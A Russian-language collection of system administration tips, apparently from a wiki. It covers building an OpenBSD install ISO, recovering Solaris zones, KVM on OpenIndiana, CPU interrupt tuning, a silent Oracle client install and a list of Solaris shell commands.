Необходимые файлы: $ ls -lh итого 267M -r-xr-xr-x 1 lexa lexa 36M Дек 9 21:27 base38.tgz -r-xr-xr-x 1 lexa lexa 5,1M Дек 9 21:27 bsd -r-xr-xr-x 1 lexa lexa 4,5M Дек 9 21:28 bsd.rd -r-xr-xr-x 1 lexa lexa 2,9M Дек 9 21:41 cdrom38.fs -r-xr-xr-x 1 lexa lexa 563 Дек 9 21:28 CKSUM -r-xr-xr-x 1 lexa lexa 21M Дек 9 21:28 comp38.tgz -r-xr-xr-x 1 lexa lexa 1,1M Дек 9 21:28 etc38.tgz -r-xr-xr-x 1 lexa lexa 7,3K Дек 9 21:41 ftplist -r-xr-xr-x 1 lexa lexa 2,5M Дек 9 21:28 game38.tgz -r-xr-xr-x 1 lexa lexa 7,1M Дек 9 21:28 man38.tgz -r-xr-xr-x 1 lexa lexa 1019 Дек 9 21:28 MD5 -r-xr-xr-x 1 lexa lexa 2,2M Дек 9 21:28 misc38.tgz -r-xr-xr-x 1 lexa lexa 8,4M Дек 9 21:41 ports.tar.gz -r-xr-xr-x 1 lexa lexa 4,7K Дек 9 21:41 root.mail -r-xr-xr-x 1 lexa lexa 100M Дек 9 21:42 src.tar.gz -r-xr-xr-x 1 lexa lexa 17M Дек 9 21:42 sys.tar.gz -r-xr-xr-x 1 lexa lexa 10M Дек 9 21:28 xbase38.tgz -r-xr-xr-x 1 lexa lexa 92K Дек 9 21:28 xetc38.tgz -r-xr-xr-x 1 lexa lexa 32M Дек 9 21:28 xfont38.tgz -r-xr-xr-x 1 lexa lexa 18M Дек 9 21:28 xserv38.tgz -r-xr-xr-x 1 lexa lexa 2,0M Дек 9 21:28 xshare38.tgz Пусть рабочая директория будет files, тогда структура подготовленных файлов должна быть такая: $ tree -s files/ files/ |-- [ 4096] 3.8 | `-- [ 4096] i386 | |-- [ 563] CKSUM | |-- [ 1019] MD5 | |-- [ 36790935] base38.tgz | |-- [ 5281094] bsd | |-- [ 4658297] bsd.rd | |-- [ 21015186] comp38.tgz | |-- [ 1150325] etc38.tgz | |-- [ 2599491] game38.tgz | |-- [ 7408552] man38.tgz | |-- [ 2276103] misc38.tgz | |-- [ 10471148] xbase38.tgz | |-- [ 93384] xetc38.tgz | |-- [ 33216689] xfont38.tgz | |-- [ 18609057] xserv38.tgz | `-- [ 2034078] xshare38.tgz |-- [ 2949120] cdrom38.fs |-- [ 7470] ftplist |-- [ 8775929] ports.tar.gz |-- [ 4742] root.mail |-- [ 104553952] src.tar.gz `-- [ 16854676] sys.tar.gz дерево каталогов: $ tree -d files files `-- 3.8 `-- i386 Создание ISO: $ mkisofs -vrTJV OpenBSD38 -b cdrom38.fs -c boot.catalog -o OpenBSD38.iso files ls -l drwxr--r-- 3 lexa lexa 4096 Дек 9 21:29 files -rw-rw-r-- 1 lexa lexa 279166976 Дек 9 22:21 OpenBSD38.iso Установочный ISO OpenBSD 3.8 готов!

Русификация консоли OpenBSD 3.7 (доп. ссылка 1) Автор: Игорь Грабин [обсудить]

Подключение русской раскладки: echo ru > /etc/kbdtype После чего добавляем в /etc/rc.local такое: wsfontload /usr/share/misc/pcvtfonts/koi8-r-8x16 for cons in `jot 6 1 6`; do wsconscfg -dF $cons; wsconscfg -t 80x25bf $cons; done unset cons wsconsctl -w keyboard.map+="keycode 157=Mode_Lock" Вместо koi8-r-8x16 можно указать koi8-u-8x16. В качестве переключателя раскладки используется правый CTRL Замечание: Экран ttyC0 создаётся всегда и не может быть удалён, поэтому не может отображать кириллицу.

Solaris специфика

Опыт восстановления работы zones в Solaris 11 Express/OpenSolaris (доп. ссылка 1) Автор: sergm [комментарии]

После скоропостижной гибели жесткого диска с лежащими на нем зонами, наступило время восстановить их из бекапа и запустить. Казалось, тривиальная процедура, отрепетированная на тестовых системах (но не тех, где лежали зоны - это важно) отняла много времени и поставила несколько вопросов, ответы на которые еще придется поискать. Восстанавливаем зону из бекапа: # zfs send -R backup/zone/develop@rep201108250419 | zfs receive -F vol01/ zone/develop@rep201108250419 Стартуем зону и наблюдаем странное: # zoneadm -z develop boot zone 'develop': ERROR: no active dataset. zone 'develop': zoneadm: zone 'develop': call to zoneadmd failed Ошибка явно говорит о том, что у нас что-то не в порядке со свойствами датасета. Начинаем осмотр датасета Чтобы было с чем сравнивать, я создал и запустил тестовую зону, свойства ее файловых систем и брал за эталон. Тестовая зона создается примерно так: # zonecfg -z testzone testzone: No such zone configured Use’create’ to begin configuring a new zone. zonecfg:testzone>create zonecfg:testzone>set zonepath=/vol01/zone/testzone zonecfg:testzone>set autoboot=false zonecfg:testzone>add net zonecfg:testzone:net>set physical=e1000g4 zonecfg:testzone:net>set address=192.168.0.24/24 zonecfg:testzone:net>end zonecfg:testzone>verify zonecfg:testzone>commit zonecfg:testzone>exit # zoneadm -z testzone install ... # zoneadm -z testzone boot При инсталляции в OpenSolaris/Solaris 11 создаются три датасета (по адресу zonepath): # zfs list | grep vol01/zone/testzone NAME vol01/zone/testzone vol01/zone/testzone/ROOT vol01/zone/testzone/ROOT/zbe Лечение Смотрим полный список свойств датасетов исправной и сломанной зон и сравниваем их: # zfs get all vol01/zone/testzone (сдесь должен быть очень большой вывод, который я пропустил и самое интересное из которого можно увидеть ниже) # zfs get all vol01/zone/testzone/ROOT ... # zfs get all vol01/zone/testzone/ROOT/zbe ... # zfs get all vol01/zone/develop ... # zfs get all vol01/zone/develop/ROOT ... # zfs get all vol01/zone/develop/ROOT/zbe ... Наблюдаем основную разницу в данных свойствах датасета: # zfs get zoned,canmount,mountpoint,org.opensolaris.libbe:parentbe,org.opensolaris.libbe:active vol01/zone/testzone/ROOT/zbe NAME PROPERTY VALUE SOURCE vol01/zone/testzone/ROOT/zbe zoned on inherited from vol01/zone/testzone/ROOT vol01/zone/testzone/ROOT/zbe canmount noauto local vol01/zone/testzone/ROOT/zbe mountpoint legacy inherited from vol01/zone/testzone/ROOT vol01/zone/testzone/ROOT/zbe org.opensolaris.libbe:parentbe 2aadf62d-9560-e14b-c36a-f9136fbce6e9 local vol01/zone/testzone/ROOT/zbe org.opensolaris.libbe:active on local # zfs get zoned,canmount,mountpoint,org.opensolaris.libbe:parentbe,org.opensolaris.libbe:active vol01/zone/develop/ROOT/zbe NAME PROPERTY VALUE SOURCE vol01/zone/develop/ROOT/zbe zoned off default vol01/zone/develop/ROOT/zbe canmount on default vol01/zone/develop/ROOT/zbe mountpoint /vol01/zone/develop/ROOT/zbe default vol01/zone/develop/ROOT/zbe org.opensolaris.libbe:parentbe - - vol01/zone/develop/ROOT/zbe org.opensolaris.libbe:active - - Исправляем, чтобы было нормально: # zfs set zoned=on vol01/zone/develop/ROOT/zbe # zfs set canmount=noauto vol01/zone/develop/ROOT/zbe # zfs set mountpoint=legacy vol01/zone/develop/ROOT/zbe # zfs set org.opensolaris.libbe:parentbe=2aadf62d-9860-e14b-c36a-f9106fbce6e9 vol01/zone/develop/ROOT/zbe # zfs set org.opensolaris.libbe:active=on vol01/zone/develop/ROOT/zbe Аналогично, правим vol01/zone/develop/ROOT после сравнения с работающей зоной: # zfs get zoned,canmount,mountpoint,org.opensolaris.libbe:parentbe,org.opensolaris.libbe:active vol01/zone/testzone/ROOT NAME PROPERTY VALUE SOURCE vol01/zone/testzone/ROOT zoned on local vol01/zone/testzone/ROOT canmount on default vol01/zone/testzone/ROOT mountpoint legacy local vol01/zone/testzone/ROOT org.opensolaris.libbe:parentbe - - vol01/zone/testzone/ROOT org.opensolaris.libbe:active - - # zfs get zoned,canmount,mountpoint,org.opensolaris.libbe:parentbe,org.opensolaris.libbe:active vol01/zone/develop/ROOT NAME PROPERTY VALUE SOURCE vol01/zone/develop/ROOT zoned off default vol01/zone/develop/ROOT canmount on default vol01/zone/develop/ROOT mountpoint /vol01/zone/develop/ROOT default vol01/zone/develop/ROOT org.opensolaris.libbe:parentbe - - vol01/zone/develop/ROOT org.opensolaris.libbe:active - - # zfs set zoned=on vol01/zone/develop/ROOT # zfs set canmount=on vol01/zone/develop/ROOT После этого у нас все хорошо: свойства датасетов практически идентичны. # zlogin -C develop [Connected to zone 'develop' console] [NOTICE: Zone booting up] SunOS Release 5.11 Version snv_134 64-bit Copyright 1983-2010 Sun Microsystems, Inc. All rights reserved. Use is subject to license terms. Hostname: develop Reading ZFS config: done. Mounting ZFS filesystems: (5/5) develop console login: mike Password: Last login: Mon Aug 2 06:41:54 from nostalgia Sun Microsystems Inc. SunOS 5.11 snv_134 February 2010 (mike@develop)$ su Password: Aug 27 15:04:13 develop su: ‘su root’ succeeded for mike on /dev/console (root@develop)# svcs -xv (root@develop)# Вместо послесловия Если у зоны были смонтированы из глобальной зоны файловые системы через lofs, будет такой казус - зона загрузиться, но локальные файловые системы не будут смонтированы, сервис filesystem/local:default перейдет в состояние maintenance с ошибкой 262 в логах: /usr/bin/zfs mount -a failed: cannot mount local filesystem. Проблему можно решить экспортировав и затем импортировав зону # zoneadm -z webapp detach # zoneadm -z webapp attach После этого все будет работать нормально.

Использование системы виртуализации KVM в OpenIndiana (доп. ссылка 1) [комментарии]

В бета-версии 151 сборки проекта OpenIndiana, в рамках которого независимым сообществом развивается построенное на кодовой базе Illumos ответвление от OpenSolaris, появилась поддержка системы виртуализации KVM. Поддержка KVM была ранее портирована компанией Joyent для своей ОС SmartOS и на днях перенесена в Illumos (за исключением поддержки KVM branded zone, которая пока не добавлена). <p>Для использования KVM пользователям последней доступной сборки oi_148 необходимо выполнить обновление до oi_151_beta: sudo pkg set-publisher -g http://pkg.openindiana.org/dev-il -G http://pkg.openindiana.org/dev openindiana.org sudo pkg image-update --be-name oi_151_beta После чего можно подключить репозиторий с пакетами для работы с KVM и установить требуемые инструменты: sudo pkg set-publisher -p http://pkg.openindiana.org/kvm-test sudo pkg install driver/i86pc/kvm system/qemu system/qemu/kvm Управление окружениями производится при помощи стандартных утилит из состава QEMU. Использование libvirt пока не поддерживается. Пример использования. Создаем образ гостевой системы: qemu-img create -f qcow2 virt.img 15G Устанавливаем операционную систему в гостевое окружение: qemu-kvm -hda virt.img -cdrom install_cd.iso -boot d -m 512 Запускаем гостевое окружение (вместо qemu-kvm можно использовать qemu-system-x86_64): qemu-kvm -hda virt.img -net nic -net user

Улучшение производительности Solaris на многопроцессорных системах (доп. ссылка 1) Автор: ikorolev [комментарии]

Для улучшения производительности в многопроцессорных (в том числе Multithreading) системах с ОС Solaris можно использовать выделенные процессоры для обработки прерываний устройств ввода-вывода. Это позволяем снизить количество переключений контекста для процессоров, увеличить попадания в кэш, в конечном счете отдать больше ресурсов для обработки пользовательских задач. Solaris 10: Для того, чтобы привязать процессор к обработке прерываний устройства: 1. Определяем процессор, на который попадает большинство системных прерываний по данному адаптеру (например по сетевому адаптеру nxge): # intrstat 2 1|egrep 'device|nxge' .. device | cpu92 %tim cpu93 %tim cpu94 %tim cpu95 %tim nxge#0 | 0 0.0 0 0.0 0 0.0 0 0.0 device | cpu96 %tim cpu97 %tim cpu98 %tim cpu99 %tim nxge#0 | 20816 67.4 13877 33.6 0 0.0 0 0.0 device | cpu100 %tim cpu101 %tim cpu102 %tim cpu103 %tim nxge#0 | 0 0.0 0 0.0 0 0.0 0 0.0 ... В нашем случае - это процессоры 96 и 97. 2. Проверяем количество переключений контекста для этих процессоров (колонка csw в выводе команды mpstat): # mpstat 1 3 |egrep 'CPU|^ 96|^ 97' CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 0 0 3385 4021 3970 84 0 9 53 0 466 3 13 0 83 97 0 0 1028 1295 1207 131 2 14 29 0 691 9 5 0 87 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 0 0 3032 3552 3510 71 0 7 45 0 429 4 12 0 84 97 0 0 981 1201 1131 116 1 23 27 0 429 2 4 0 94 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 0 0 3049 3598 3547 78 0 9 34 0 645 12 12 0 77 97 0 0 980 1226 1139 160 1 5 29 0 245 3 5 0 92 3. Создаем процессорный set с процессорами 96 и 97 # psrset -c 96 97 created processor set 1 processor 96: was not assigned, now 1 processor 97: was not assigned, now 1 4. Проверяем переключений контекста: # mpstat -P 1 1 3 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 1 0 2195 2462 2434 41 1 4 66 0 325 6 8 0 86 97 1 0 775 769 725 63 1 8 58 0 354 7 3 0 91 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 0 0 3103 3634 3634 0 0 0 34 0 0 0 11 0 89 97 0 0 1032 1193 1192 0 0 0 16 0 0 0 3 0 97 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl 96 0 0 2941 3426 3425 0 0 0 44 0 0 0 12 0 88 97 0 0 997 1172 1170 0 0 0 18 0 0 0 3 0 97 Solaris 9: Т.к. утилиты intrstat в Solaris 9 нет, то ориентироваться можно только на вывод команды mpstat (колонка intr). Выбираем процессор или несколько процессоров с наибольшим количеством прерываний и переносим их в сэт. Если процессоров не так много, или сервер состоит из системных плат, объединенных через общую шину (типа sf4800, sf6900, e25k итд) - то можно пойти другим путем - привязать процессы к процессорному сэту и запретить прерывания для этого сэта. Тем самым повышаем попадания в кэш, уменьшится трафик между системными платами, можно выделить как бы гарантированный квант процессорных ресурсов приложению. Итак, пусть у нас средняя железка, 24 процессора. Создадим процессорный сэт из процессоров 0-7 # psrset -c 0-7 created processor set 1 processor 0: was not assigned, now 1 processor 1: was not assigned, now 1 processor 2: was not assigned, now 1 .. Проверяем: # mpstat 2 5 ... CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl ... 21 308 0 17969 1410 1132 955 304 391 380 0 1340 67 29 3 1 22 364 0 18396 469 1 1541 472 583 612 0 2056 80 10 10 0 23 301 0 11905 375 1 1121 376 464 342 0 2969 86 8 5 0 0 0 0 221 499 396 0 0 0 14 0 0 0 1 0 99 1 0 0 1 5 1 0 0 0 0 0 0 0 0 0 100 2 0 0 1 5 1 0 0 0 0 0 0 0 0 0 100 ... Ищем процесс, который мы собираемся отдать в процессорный сэт: # ps -ef | grep lsnr oracle 1811 1 0 Apr 12 ? 74:55 /oracle/dbase10g/bin/tnslsnr listener -inherit Привязываем процесс (и подпроцессы, которые он порождает в сэт) # psrset -b 1811 Запрещаем прерывания на этот сэт # psrset -f 1 Проверяем: # mpstat 2 5 CPU minf mjf xcal intr ithr csw icsw migr smtx srw syscl usr sys wt idl ... 22 470 0 10802 557 218 708 342 282 109 0 1982 89 9 2 0 23 132 0 12200 1501 1260 610 262 264 166 0 1120 86 12 2 0 0 0 0 1 6 1 0 0 0 0 0 0 0 0 0 100 1 0 0 1 6 1 0 0 0 0 0 0 0 0 0 100 2 0 0 1 6 1 0 0 0 0 0 0 0 0 0 100 Убеждаемся, что прерывания на процессорах из сэта заметно уменьшились (столбец intr). Ну и в любой момент процессорный сэт можно удалить: # psrset -d 1

Изменение UID работающего процесса в Solaris 10 (доп. ссылка 1) Автор: ikorolev [комментарии]

В утилите pcred из комплекта Solaris 10 появилась возможность на лету менять идентификатор владельца уже запущенного процесса: # ps -ef | grep sleep vasya 4088 4081 0 09:50:53 pts/11 0:00 sleep 10000000 # pcred -u 123 4088 # ps -ef | grep sleep kolya 4088 4081 0 09:50:53 pts/11 0:00 sleep 10000000

Удаление zombie процессов в Solaris (доп. ссылка 1) [комментарии]

Нередко из-за отсутствия обработчика сигнала SIGCHLD в родительском процессе, после завершения дочерней программы, остаются "<defunct>" или zombie процессы. Zombie процессы не занимают системные ресурсы, кроме записи в таблице процессов, что может вызвать ее переполнение и как следствие блокировку запуска новых процессов, при большой интенсивности появления zombie. Zombie исчезают после завершения работы родительского процесса, но записи в таблице также можно очистить принудительным путем. Получаем список zombie процессов: ps -ecl |grep "Z" F S UID PID PPID CLS PRI ADDR SZ WCHAN TTY TIME CMD 0 Z 100 27841 27840 - 0 - 0 - ? 0:00 <defunct> "kill" и "kill -9" в случае zombie использовать бесполезно. В Solaris для эмуляции вызова wait() для чтения кода возврата из таблицы процессов существует утилита preap: preap 27841 27841: exited with status 0

Замена для ldconfig в Solaris Автор: TS [обсудить]

Чтобы добавить нестандартный путь к библиотекам (например /usr/local/ssl/lib/) в линкер в Solaris вместо отсутствующей в этой ОС команды ldconfig нужно использовать команду crle: crle -u -l /usr/local/ssl/lib

Как обновить пакет в Solaris 8 Автор: TS [комментарии]

Если при установке пакета на Solaris 8 через pkgadd -d package он ругается что такой пакет уже установлен - Current administration requires that a unique instance of the <pkg> package be created. However, the maximum number of instances of the package that may be supported at one time on the same system has already been met. No changes were made to the system. нужно отредактировать /var/sadm/install/admin/default instance=unique заменить на instance=overwrite

Установка клиента Oracle в Solaris без использования графического интерфейса (доп. ссылка 1) Автор: Kovalchuk Egor [обсудить]

На официальном сайте Oracle присутствует небольшое руководство по установке в Solaris без использования графического интерфейса, при этом оно сводится к тому, что нужно запустить скрипт под графическим интерфейсом с дополнительными параметрами. /directory_path/runInstaller -record -destinationFile response_filename В итоге получаем файл, который может быть использован при установке, но установка графического интерфейса была не приемлема, поэтому пришлось разбираться самому с файлом ответов. Для установки нужно скачать клиента с оф. сайта Oracle. скачать можно по адресу: http://download-llnw.oracle.com/otn/solaris/oracle10g/10201/sol64/10gr2_client_sol.cpio.gz создайте пользователя и группу для клиента например: useradd oracle groupadd oracle usermod -g oracle oracle passwd oracle Создайте папку распакуйте полученный архив в эту папку и дайте команду chown -R oracle:oracle /directory_path/ Теперь нужно править или создать свой фаил ответов версию можем не трогать RESPONSEFILE_VERSION=2.2.1.0.0 имя группы которую создали для оракла UNIX_GROUP_NAME="oracle" если вы брали стандартый дистрибутив с сайта менять не надо FROM_LOCATION="../stage/products.xml" имя и путь к следующему фаилу ответов NEXT_SESSION_RESPONSE="" Куда устанавливаем ORACLE_HOME="/export/home/oracle/client" ORACLE_HOME_NAME="OraClient" эти значения нужно оставить по молчанию. Беруться из примеров файлов ответов в дистрибутиве TOPLEVEL_COMPONENT={"oracle.client","10.2.0.1.0"} DEINSTALL_LIST={"oracle.client","10.2.0.1.0"} т.к. у нас тихая инсталяция а эти параметры требуют графический интерфейс скидываем их все в false SHOW_SPLASH_SCREEN=false SHOW_WELCOME_PAGE=false SHOW_CUSTOM_TREE_PAGE=false SHOW_SUMMARY_PAGE=false SHOW_INSTALL_PROGRESS_PAGE=false SHOW_CONFIG_TOOL_PAGE=false SHOW_XML_PREREQ_PAGE=false SHOW_ROOTSH_CONFIRMATION=true SHOW_END_SESSION_PAGE=false SHOW_EXIT_CONFIRMATION=false SHOW_DEINSTALL_CONFIRMATION=false SHOW_DEINSTALL_PROGRESS=false следующая сессия нам не нужна поэтому скидываем параметры в false NEXT_SESSION=false NEXT_SESSION_ON_FAIL=false CLUSTER_NODES={} какую папку удалить после установки REMOVE_HOMES="" выбор поддержки языка COMPONENT_LANGUAGES={"en"} тип исталяции INSTALL_TYPE="Administrator" если используется тип инсталяции Custom нужно добавить еще один параметр, где перечисляются нужные компоненты DEPENDENCY_LIST={"oracle.sqlj:10.2.0.1.0","oracle.rdbms.util:10.2.0.1.0", "oracle.javavm.client:10.2.0.1.0","oracle.sqlplus:10.2.0.1.0", "oracle.dbjava.jdbc:10.2.0.1.0","oracle.ldap.client:10.2.0.1.0", "oracle.rdbms.oci:10.2.0.1.0","oracle.precomp:10.2.0.1.0","oracle.xdk:10.2.0.1.0", "oracle.swd.opatch:10.2.0.1.0","oracle.network.aso:10.2.0.1.0","oracle.oem.client:10.2.0.1.0", "oracle.oraolap.mgmt:10.2.0.1.0","oracle.network.client:10.2.0.1.0","oracle.ordim.client:10.2.0.1.0", "oracle.ons:10.1.0.3.0","oracle.has.client:10.2.0.1.0"} после того как готов файл, залогиниваемся под пользователем клиента и запускаем команду /directory_path/runInstaller -silent -responseFile responsefilename снова перелогиниваемся под рутом и запускаем скрипт root.sh, который лежит в папке с установленным клиентом Установка прошла успешно А дальше пользуемся готовыми статьями по настройке подключений. P.S. возможны проблемы, когда некоторые фалы копируются битыми, просто перезапустите скрипт утановки.

Какие бывают релизы Solaris (доп. ссылка 1) Автор: blog.curthread.org [обсудить]

Solaris 10 - наиболее стабильный на данный момент выпуск Solaris, предназначенный для промышленного использования в продуктивных окружениях. Свободно доступен для скачивания на сайте Sun Microsystems. Для него осуществляется всесторонняя поддержка, выпускаются патчи исправляющие ошибки и проблемы безопасности. С момента выхода первой версии Solaris 10 вышло несколько обновлений, содержащих новую функциональность и исправления ошибок, список которых и краткое описание изменений можно найти здесь. Эти обновления выходят в среднем раз в полгода и именуются по номерам а также по дате их выпуска (к примеру на текущий момент последним является обновление 4 - оно-же 08/07).

Solaris Express Community Edition (SXCE) - также называемый Nevada, это дистрибутив основанный на последних разработках, который в будущем превратится в Solaris 11. Новые версии выходят достаточно часто и именуются по номеру сборки (на данный момент последняя - 81). Основная цель Solaris Nevada - разработка и тестирование новой функциональности. Свободно доступен для скачивания на сайте opensolaris.org

Solaris Express Developer Edition (SXDE) - бинарный дистрибутив основанный на SXCE, прошедший этап тестирования и обеспеченный поддержкой. Предназначен в первую очередь для разработчиков. Релизы происходят значительно реже SXCE и именуются по дате выхода - последний на данный момент - 1/08. Свободно доступен для скачивания на сайте Sun Microsystems.

Open Solaris - не является полноценным дистрибутивом, а представляет из себя открытое ядро ОС и набор базовых утилит. Не содержит многих компонентов системы, необходимых для работы, и инсталлятора, поэтому может быть установлен только поверх SXCE/SXDE (которые сами построены на основе OpenSolaris). Достаточно часто появляются бинарные сборки. Доступен для свободного скачивания на opensolaris.org и сайте Sun Microsystems. Стоит отметить что постоянно идет процесс портирования новых возможностей из Open Solaris в Solaris 10.

Solaris Indiana - дистрибутив основанный на OpenSolaris и направленный на использование в качестве десктопа. На данный момент последняя версия - Developer Preview 2, выполненная в виде LiveCD. Доступен для свободного скачивания на opensolaris.org. Возможно в будущем Indiana заменит Developer Edition.

Подборка полезных shell команд для Solaris (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]
Отладка

cat -v -t -e [file] Показать неотображаемые символы

dumpadm -d swap Сконфигурировать swap устройство как dump устройство

ld -l Проверка наличия библиотеки

truss -f -p Использование нескольких окон. Это может использоваться при отслеживании setuid/setgid программ

truss executable Отслеживание команды (полезно при отладке)

Работа с диском

/bin/mount -F hsfs -o ro /dev/sr0 /cdrom Монтирование ISO 9660 CDROM

/usr/bin/iostat -E Отображение статистики дисков

du -ad /var | sort -nr Отчет об использовании /var сортированный в обратном порядке

du -k . Отчет об использовании диска в килобайтах

du -sk * | sort -nr | head Показать 10 самых больших файлов/каталогов

du -sk *|sort -k1,1n Отчет об использованном пространстве в текущем каталоге

du -sk . Отчет об общем использовании диска в килобайтах

fdformat -d -U Форматирование дискеты

newfs -Nv /dev/rdsk/c0t0d0s1 Просмотр доступных суперблоков

prtvtoc /dev/rdsk/c0t0d0s2 Информация о геометрии и разделах диска

prtvtoc /dev/rdsk/c0t0d0s2 | fmthard -s - /dev/rdsk/c0t1d0s2 Копировать таблицу разделов с одного диска на другой

quot -af Сколько дискового пространства используется пользователем

volrmmount -i floppy Монтирование дисковода или другого устройства просто по его имени

Параметры ядра

ndd /dev/ip ip_forwarding Показать переменную ip_forwarding в ядре

ndd /dev/ip ip_forwarding 1 Установить переменную ip_forwarding в ядре

ndd /dev/ip \? Показать все IP переменные в ядре

Управление файлами

dos2unix | -ascii Конвертировать файлы формата DOS в формат Unix

fold -w 180 Удалить строки с больше чем 180 символов

split [-linecount] [file] Разбить файл на части

[vi] : %s/existing/new/g Поиск и замена текста в vi

[vi] :set list Показать неотображаемые символы в vi

[vi] :set nu Пронумеровать строки в vi

[vi] :set ts=[num] Установить значение табуляции в vi

Файловая система

/sbin/uadmin x x Синхронизация файловых систем и быстрая перезагрузка

awk ' END {print NR}' file_name Вывести количество строк в файле

cat /dev/null > filename Нулевой вывод в файл без прерывания пайпа

dd if=/dev/rdsk/... of=/dev/rdsk/... bs=4096 Сделать зеркало загрузочного диска

df -k | grep dg| awk '{print $6}' |xargs -n 1 umount Отмонтировать все файловые системы в группе дисков dg

fsck -F ufs -o b=97472 /dev/rdsk/c0t0d0s0 Проверить и восстановить файловую систему UFS на c0t0d0s0 используя альтернативные суперблоки

fsck -F ufs -y /dev/rdsk/c0t0d0s0 Восстановить файловую систему UFS на c0t0d0s0 без подтверждения

fsck -F ufs /dev/rdsk/c0t0d0s0 Проверить файловую систему UFS на c0t0d0s0

gzip -d -c tarball.tgz | (cd /[dir];tar xf - ) & Распаковка архива в указанное место

gzip -dc file1.tar.gz | tar xf - Распаковка архива

ln [-fhns] Создать жесткую или мягкую ссылку

ls -al | awk '$3 == "oracle" || $3 == "root" {print $9}' Вывод всех файлов, владельцем которых является

ls -l | sort +4n Список файлов по размеру

ls -la | awk '{ print $5," ",$9 }' | sort -rn Размер файлов в текущем каталоге

ls -lR | awk '{total +=$5};END {print "Total size: " total/1024/1024 "MB" }' Рекурсивный подсчет размера каталогов в Мб

mkisofs -l -L -r -o [image-name].iso [directory] Создать образ ISO из каталога

mount -F ufs -o rw,remount / Перемонтировать корневой раздел в rw

mount -o remount,logging /spare Перемонтировать ro в rw aи включить журналирование ufs

mount -f pcfs /dev/dsk/c0d0p1 /export/dos Примонтировать раздел DOS

mv [filename]{,.new_suffix} Переименовать файл

pax -rw . /newdir Альтернативный метод копирования каталогов

prtvtoc /dev/rdsk/c0t0d0s2 | fmthard -s - /dev/rdsk/c0t1d0s2 Клонировать таблицу разделов

tar cf - . | (cd /newdir ; tar xf -) Рекурсивное копирование файлов и разрешенй

tar cvf filename.tar Создать архив

tar xvf filename.tar Распаковать архив

X=$(wc -l < filename); echo $X Подсчет количества строк в файле (ksh)

zcat Распаковка patch_file

zcat [cpio file] | cpio -itmv Показать содержимое cpio

Передача файлов

find . -depth | cpio -pdmv /path/tobe/copied/to Быстрая альтернатива cp -pr

find . -follow | cpio -pdumL /path/tobe/copied/to Копирование с символическими ссылками

get filename.suffix |"tar xf -" Недокументированная возможность FTP

ssh cd /some/directory \&\& tar cf - | ssh cd /some/direstory \&\& tar xvf - Переместить файлы без фактического обращения к ним

put "| tar cf - ." filename.tar Недокументированная возможность FTP

sendport Команда FTP, служащая для передачи большого количества файлов в пределах одной сессии

Общие

/bin/printf '%d\n' '0x' Преобразование шестнадцатеричного числа в десятичное

/usr/bin/catman -w Создать индекс базы данных страниц руководства man

FQ_FILENAME=; echo ${FQ_FILENAME%/*}

mailx -H -u Список заголовков писем конкретного пользователя

ps -ef | grep -i $@

set filec Установить автодополнение имен файлов для csh

uuencode [filename] [filename] | mailx -s "Subject" [user to mail] Послать файл в аттаче

xauth -f /home/${LOGNAME} extract - ${DISPLAY} | xauth merge -

Аппаратное обеспечение

cfgadm Проверить конфигурирумые аппаратные устройства

m64config -depth 8|24 Установить глубину цвета M64

m64config -prconf Вывести конфигурацию адаптера M64

m64config -res 'video_mode' Изменить разрешение графического адаптера M64

prtpicl -v | grep sync-speed Обзор скорости синхронизации SCSI

Ядро

/usr/sbin/modinfo Информация о модулях ядра

/usr/sbin/modload Загрузить модуль ядра

/usr/sbin/modunload -i Выгрузить модуль ядра

/usr/sbin/sysdef Детальный вывод настройки ядра

nm -x /dev/ksyms | grep OBJ | more Настраиваемые параметры ядра

Память

pagesize -a Доступный размер страницы для Solaris 9

prtconf | grep Mem Вывод размера памяти на локальной машине

Информация о сети

arp -a Вывод arp таблицы

arp -d myhost Удалить запись определенного хоста из таблицы

lsof -iTCP@10.20.2.9 Отобразить открытые файлы для определенного хоста

ndd /dev/arp arp_cache_report Напечатать arp таблицу выводя mac и IP адреса

netstat -a | grep EST | wc -l Показать число активных подключений к данной машине

netstat -a | more Показать состояние сокетов на этой машине

netstat -i Показать состояние TCP/IP интерфейсов

netstat -k hme0 Недокументированная опция netstat

netstat -np Аналог команды arp -a, без разрешения имен

netstat -r Таблица маршрутов

netstat -rn Таблица маршрутов, без разрешениия имен

snoop -S -ta [machine] Прослушивание сетевых пакетов, включая размер и время

traceroute Маршрут к данному адресу

Настройка сети

/sbin/ifconfig hme0:1 inet 10.210.xx.xxx netmask 255.255.0.0 broadcast 10.210.xxx.xxx Виртуальный интерфейс

/sbin/ifconfig hme0:1 up Поднять виртуальный интерфейс

/usr/sbin/ndd -set /dev/hme adv_100fdx_cap 1

ifconfig eth0 10.1.1.1 netmask 255.255.255.255 Добавить интерфейс

ifconfig eth0 mtu 1500 Сменить MTU на интерфейсе

ndd -set /dev/ip ip_addrs_per_if 1-8192 Задать больше, чем 256 виртуальных IP адресов

ndd -set /dev/tcp tcp_recv_hiwat 65535 Увеличить TCP буфер приема на Sol2.5.1 с 100BaseTx

ndd -set /dev/tcp tcp_xmit_hiwat 65535 Увеличить TCP буфер передачи на Sol2.5.1 с 100BaseTx

Процессы

/usr/proc/bin/ptree Вывести дерево родителя/детей для процесса

/usr/proc/bin/pwdx Вывести рабочий каталог процесса

/usr/ucb/ps -aux | more Отобразить использование CPU % для каждого процесса

/usr/ucb/ps -auxww | grep Получить полный список процессов (очень длинный)

fuser -uc /var Процессы, запущенные из /var

ipcs Отчет о межпроцессных взаимодействиях

kill -HUP `ps -ef | grep [p]roccess | awk '{print $2}'` Послать всем связанным процессам сигнал HUP за один раз

lsof -i TCP:25 Соотнести порт с приложением

pfiles Показать файлы, открытые процессом

pkill -n Убить процесс с определенным именем

prstat -a Альтернатива команде top

ps -edf -o pcpu,pid,user,args Форматированый вывод 'ps'

ps -ef | grep -i | awk '{ print $2 }' Создать список PID содержащих

ps -ef | grep | grep -v grep | cut -c 10-15 | xargs kill -9 Найти и убить процесс

ps -ef | more Показать все запущенные процессы

